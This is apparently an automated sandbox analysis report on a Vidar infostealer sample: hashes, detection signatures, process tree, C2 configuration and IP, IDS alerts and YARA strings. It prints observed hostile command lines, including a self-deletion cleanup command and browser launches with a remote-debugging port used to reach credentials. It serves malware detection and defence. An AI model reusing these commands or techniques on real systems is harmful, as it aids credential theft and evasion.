
Windows Analysis Report
N11R7lRasm.exe

Overview

General Information

Sample name: N11R7lRasm.exe (renamed because original name is a hash value)
Original sample name: 9f680720826812af34cbc66e27e0281f.exe
Analysis ID: 1614222
MD5: 9f680720826812af34cbc66e27e0281f
SHA1: fb580afbf6fb913e83eea1fb99be9c95b6ec39d5
SHA256: 19198e75f7c830441360a42b06e10415f4368300a7590c119c237ea8c67bf23e
Tags: exe, user-abuse_ch

Detection

Vidar
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Vidar stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Monitors registry run keys for changes
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • N11R7lRasm.exe (PID: 4424 cmdline: "C:\Users\user\Desktop\N11R7lRasm.exe" MD5: 9F680720826812AF34CBC66E27E0281F)
    • BitLockerToGo.exe (PID: 6552 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
      • chrome.exe (PID: 3848 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 5300 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2468 --field-trial-handle=2372,i,16807786506752163932,14709765720490292279,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • msedge.exe (PID: 7632 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 7868 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2608 --field-trial-handle=2468,i,12661693246344684828,3544474529301919065,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • cmd.exe (PID: 8060 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" & rd /s /q "C:\ProgramData\t0r90" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 3520 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • msedge.exe (PID: 7852 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8180 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1876 --field-trial-handle=2028,i,10932699950084445446,663265973773707162,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6340 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5252 --field-trial-handle=2028,i,10932699950084445446,663265973773707162,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 4480 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6648 --field-trial-handle=2028,i,10932699950084445446,663265973773707162,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8088 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=5344 --field-trial-handle=2028,i,10932699950084445446,663265973773707162,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup
Malware Configuration (Vidar): {"C2 url": "https://steamcommunity.com/profiles/76561199825403037", "Botnet": "oomaino5"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security

Source | Rule | Description | Author | Strings
00000000.00000002.1855724656.000000000AB16000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
00000000.00000002.1855724656.000000000AB16000.00000004.00001000.00020000.00000000.sdmp | Msfpayloads_msf_9 | Metasploit Payloads - file msf.war - contents | Florian Roth
  • 0x0:$x1: 4d5a9000030000000
00000003.00000003.1906846457.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.1855724656.000000000AA40000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security

Source | Rule | Description | Author | Strings
3.2.BitLockerToGo.exe.400000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
3.2.BitLockerToGo.exe.400000.0.unpack | infostealer_win_vidar_strings_nov23 | Finds Vidar samples based on the specific strings | Sekoia.io
  • 0x19f7f:$str01: MachineID:
  • 0x18f4f:$str02: Work Dir: In memory
  • 0x1a027:$str03: [Hardware]
  • 0x19f68:$str04: VideoCard:
  • 0x196c0:$str05: [Processes]
  • 0x196cc:$str06: [Software]
  • 0x18fe0:$str07: information.txt
  • 0x19cbc:$str08: %s\*
  • 0x19d09:$str08: %s\*
  • 0x191fd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
  • 0x19592:$str12: UseMasterPassword
  • 0x1a033:$str13: Soft: WinSCP
  • 0x19a6b:$str14: <Pass encoding="base64">
  • 0x1a016:$str15: Soft: FileZilla
  • 0x18fd2:$str16: passwords.txt
  • 0x195bd:$str17: build_id
  • 0x19684:$str18: file_data
0.2.N11R7lRasm.exe.aa00000.2.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
0.2.N11R7lRasm.exe.aa00000.2.raw.unpack | infostealer_win_vidar_strings_nov23 | Finds Vidar samples based on the specific strings | Sekoia.io
  • 0x19f7f:$str01: MachineID:
  • 0x18f4f:$str02: Work Dir: In memory
  • 0x1a027:$str03: [Hardware]
  • 0x19f68:$str04: VideoCard:
  • 0x196c0:$str05: [Processes]
  • 0x196cc:$str06: [Software]
  • 0x18fe0:$str07: information.txt
  • 0x19cbc:$str08: %s\*
  • 0x19d09:$str08: %s\*
  • 0x191fd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
  • 0x19592:$str12: UseMasterPassword
  • 0x1a033:$str13: Soft: WinSCP
  • 0x19a6b:$str14: <Pass encoding="base64">
  • 0x1a016:$str15: Soft: FileZilla
  • 0x18fd2:$str16: passwords.txt
  • 0x195bd:$str17: build_id
  • 0x19684:$str18: file_data
0.2.N11R7lRasm.exe.aa40000.1.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security

System Summary

Source: Process started | Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 6552, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 3848, ProcessName: chrome.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-13T13:14:06.320535+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49713 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:08.302308+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49714 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:09.705451+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49715 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:11.221673+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49716 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:12.591051+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49717 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:13.993701+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49718 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:14.980465+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49719 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:23.558298+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49743 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:24.609780+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49746 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:25.609911+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49747 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:28.424092+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49748 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:28.664535+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49749 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:34.811776+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49778 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:36.198286+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49785 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:37.228290+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49805 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:38.331639+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49808 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:39.579656+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49839 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:41.613947+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49853 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:42.719407+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49859 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:44.033073+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49870 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:45.414706+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49876 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:47.153833+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49891 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:49.241451+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49904 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:51.244913+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49920 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:53.783868+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49936 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:54.785015+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49946 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:55.864441+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49957 | 77.239.117.222 | 443 | TCP
2025-02-13T13:15:05.792448+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 50013 | 77.239.117.222 | 443 | TCP
2025-02-13T13:15:06.801812+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 50019 | 77.239.117.222 | 443 | TCP
2025-02-13T13:15:07.823708+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 50025 | 77.239.117.222 | 443 | TCP
2025-02-13T13:15:08.848024+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 50036 | 77.239.117.222 | 443 | TCP
2025-02-13T13:15:09.843569+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 50042 | 77.239.117.222 | 443 | TCP
2025-02-13T13:15:10.969232+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 50048 | 77.239.117.222 | 443 | TCP
2025-02-13T13:15:11.965266+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 50056 | 77.239.117.222 | 443 | TCP
2025-02-13T13:15:12.998853+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 50065 | 77.239.117.222 | 443 | TCP
2025-02-13T13:15:13.982676+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 50071 | 77.239.117.222 | 443 | TCP
2025-02-13T13:15:15.009550+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 50077 | 77.239.117.222 | 443 | TCP
2025-02-13T13:15:16.045855+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 50088 | 77.239.117.222 | 443 | TCP
2025-02-13T13:15:17.051263+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 50094 | 77.239.117.222 | 443 | TCP
2025-02-13T13:15:18.410583+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 50100 | 77.239.117.222 | 443 | TCP
2025-02-13T13:15:19.156806+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 50111 | 77.239.117.222 | 443 | TCP
2025-02-13T13:15:20.254884+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 50117 | 77.239.117.222 | 443 | TCP
2025-02-13T13:15:22.269139+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 50133 | 77.239.117.222 | 443 | TCP
2025-02-13T13:15:23.625478+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 50139 | 77.239.117.222 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-13T13:14:11.939154+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 77.239.117.222 | 443 | 192.168.2.8 | 49716 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-13T13:14:13.302988+0100 | 2051831 | 1 | Malware Command and Control Activity Detected | 77.239.117.222 | 443 | 192.168.2.8 | 49717 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-13T13:14:13.302743+0100 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.8 | 49717 | 77.239.117.222 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-13T13:14:14.788875+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49718 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:15.788444+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49719 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:24.421499+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49743 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:24.612701+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49746 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:25.613156+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49747 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:28.427836+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49748 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:29.540817+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49749 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:35.570688+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49778 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:36.201011+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49785 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:37.262248+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49805 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:38.334833+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49808 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:39.583274+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49839 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:41.616709+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49853 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:42.722601+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49859 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:47.156858+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49891 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:49.992403+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49904 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:53.786877+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49936 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:55.670395+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49946 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:55.867222+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49957 | 77.239.117.222 | 443 | TCP
2025-02-13T13:15:06.798034+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 50013 | 77.239.117.222 | 443 | TCP
2025-02-13T13:15:07.652352+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 50019 | 77.239.117.222 | 443 | TCP
2025-02-13T13:15:09.627554+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 50036 | 77.239.117.222 | 443 | TCP
2025-02-13T13:15:10.690954+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 50042 | 77.239.117.222 | 443 | TCP
2025-02-13T13:15:11.763041+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 50048 | 77.239.117.222 | 443 | TCP
2025-02-13T13:15:12.898020+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 50056 | 77.239.117.222 | 443 | TCP
2025-02-13T13:15:13.849928+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 50065 | 77.239.117.222 | 443 | TCP
2025-02-13T13:15:14.846912+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 50071 | 77.239.117.222 | 443 | TCP
2025-02-13T13:15:15.749863+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 50077 | 77.239.117.222 | 443 | TCP
2025-02-13T13:15:16.762880+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 50088 | 77.239.117.222 | 443 | TCP
2025-02-13T13:15:17.815295+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 50094 | 77.239.117.222 | 443 | TCP
2025-02-13T13:15:19.246474+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 50100 | 77.239.117.222 | 443 | TCP
2025-02-13T13:15:19.898210+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 50111 | 77.239.117.222 | 443 | TCP
2025-02-13T13:15:20.935469+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 50117 | 77.239.117.222 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-13T13:14:24.612701+0100 | 2859636 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49746 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:25.613156+0100 | 2859636 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49747 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:28.427836+0100 | 2859636 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49748 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:36.201011+0100 | 2859636 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49785 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:37.262248+0100 | 2859636 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49805 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:38.334833+0100 | 2859636 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49808 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:39.583274+0100 | 2859636 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49839 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:41.616709+0100 | 2859636 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49853 | 77.239.117.222 | 443 | TCP
2025-02-13T13:14:42.722601+0100 | 2859636 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49859 | 77.239.117.222 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-13T13:14:09.043514+0100 | 2859378 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49714 | 77.239.117.222 | 443 | TCP

                  AV Detection

Source: https://77.239.117.222/73 | Avira URL Cloud: Label: malware
Source: 00000000.00000002.1855724656.000000000AB16000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199825403037", "Botnet": "oomaino5"}
Source: N11R7lRasm.exe | ReversingLabs: Detection: 29%
Source: N11R7lRasm.exe | Virustotal: Detection: 25%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00405FE7 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0040E7E9 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,GetLastError,GetProcessHeap,HeapFree
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00406062 BCryptCloseAlgorithmProvider,BCryptDestroyKey
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0040627F LocalAlloc,BCryptDecrypt
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0040609C BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey
Source: N11R7lRasm.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
Source: unknown | HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49745 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 77.239.117.222:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: N11R7lRasm.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdbA source: N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AB16000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AA40000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000002.1852243141.000000000A8CE000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650192251.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: vdr1.pdb source: N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AB16000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AA40000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000002.1852243141.000000000A8CE000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000003.00000002.2650192251.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: BitLockerToGo.pdb source: N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AADC000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: cryptosetup.pdbGCTL source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp, f379r9.3.dr
                  Source: Binary string: cryptosetup.pdb source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp, f379r9.3.dr
                  Source: Binary string: BitLockerToGo.pdbGCTL source: N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AADC000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdb source: N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AB16000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AA40000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000002.1852243141.000000000A8CE000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000003.00000002.2650192251.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00407891 FindFirstFileA,CopyFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,FindNextFileA,FindClose, | 3_2_00407891
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0040A69C FindFirstFileA,StrCmpCA,CopyFileA,Sleep,DeleteFileA,FindNextFileA,FindClose, | 3_2_0040A69C
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00408776 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, | 3_2_00408776
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00413B10 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindNextFileA,FindNextFileA,FindClose, | 3_2_00413B10
